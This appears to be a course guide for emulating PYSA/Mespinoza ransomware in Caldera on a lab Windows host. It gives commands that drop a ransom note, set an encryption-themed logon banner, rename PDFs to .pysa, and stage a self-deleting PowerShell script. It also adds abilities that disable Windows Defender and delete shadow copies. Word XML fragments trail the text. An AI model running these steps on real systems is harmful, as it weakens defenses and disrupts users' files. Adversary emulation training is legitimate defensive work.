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PYSA/Mespinoza Ransomware Emulation Guide Using Caldera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Link to PYSA/Mespinoza Ransomware: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https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf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an adversary and add the “Disable Windows Defender All” ability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Next we need to create a ability that changes the File Association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Fill in the fields as you see below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6957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Make sure the “Platform” is “windows“ and the “Executor” is “cmd”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In the code section paste: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#This code will create a .README file on the victims desktop and put the message “Your data is #encrypted. Contact us to get your data back!” into the file.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echo Your data is encrypted.  Contact us to get your data back! &gt; C:\Users\champuser\Desktop\READ.README &amp;&amp; assoc .README=txtfile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Next we need to create an ability that changes the logon legal warning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Fill in the fields as shown below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606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Make sure the “Platform” is “windows“ and the “Executor” is “psh”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Then add the following code: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# This code will create a screen that the user will see when they log on telling them that their #data is encrypted.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Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "legalnoticetext" -Value "Information is on the Desktop to get your data.  We are looking forward to working together." ; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "legalnoticecaption" -Value "YOUR DATA IS ENCRYPTED !"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Now we need to create an ability for the ransomware itself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Fill in the fields as shown below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6322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Make sure the “Platform” is “windows“ and the “Executor” is “psh”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Then add the following code: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#This code search through the C:\Users\champuser\Documents file path and finds files with the #.pdf file extension and changes .pdf to .pysa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get-childitem C:\Users\champuser\Documents -Filter "*pdf*" -Recurse | rename-item -NewName {$_.name -replace 'pdf','pysa' }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Next we need to create an ability to emulate the “step1.ps1” and “step2.ps1” files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Fill in the fields as shown below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6449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Make sure the “Platform” is “windows“ and the “Executor” is “psh”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Then add the following code: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# This part will search the C folder for .txt files and output them to a file called “AllFiles.txt” in the #public folder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Get-ChildItem -Path C:\*.pdf -Recurse -Force | Out-File -FilePath C:\Users\Public\AllFiles.txt;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# This part will copy the powershell executable and put it in the public folder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Copy-Item "C:\Windows\\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Destination "C:\Users\Public";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# This part creates a random number and set the variable “nName” to “EnNoB-”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[Int] $rand = Get-Random -Minimum 1000 -Maximum 9876;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$nName = "EnNoB-$rand";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# This part will name the file with the nName variable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Rename-Item -Path "C:\Users\Public\powershell.exe" -NewName $nName;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# This section will initialize the file, filePath, and allFiles variables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$file = "C:\Users\Public\step2.ps1";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$filePath = "$" + "filePath";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$allFiles = "$" + "allFiles";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# This section puts the code of the “step2.ps1” into the steps file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$steps = "param([String]$filePath,[String]$allFiles);";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$steps = $steps + " type $allFiles;";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$steps = $steps + " Remove-Item $filePath -Force;";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# This will put the code in the file variable which holds the file path of the step2.ps1 file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$steps &gt; $file;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# This section initializes the parameters that will be passed to the step2.ps1 file for it to execute #properly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$params = '-filePath "C:\Users\Public\$nname" -allFiles "C:\Users\Public\AllFiles.txt" -Force';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# This command will execute the step2.p1 file given the parameters that were set.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Invoke-Expression "$file $params";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The next step is the add the “Discover Local Hosts” ability to the adversary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Lastly add the “Windows - Delete Volume Shadow Copies” ability to the adversary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Make sure when you add your host you do it with a Admin level powershell program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Now your adversary is complete and you are ready to run the operation on the victim's host :)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Note: This information came from a Threat Emulation Course created by </w:t>
      </w:r>
      <w:hyperlink r:id="rId1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Duane Dunston</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here is the link to that course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https://docs.google.com/document/d/1wvIqOVCpvhxgDQOw9DXJuiM8I2aW6UW3DkzaslKqKH4/edit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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mailto:dunston@champlain.edu" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/document/d/1wvIqOVCpvhxgDQOw9DXJuiM8I2aW6UW3DkzaslKqKH4/edit" TargetMode="Externa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hyperlink" Target="https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf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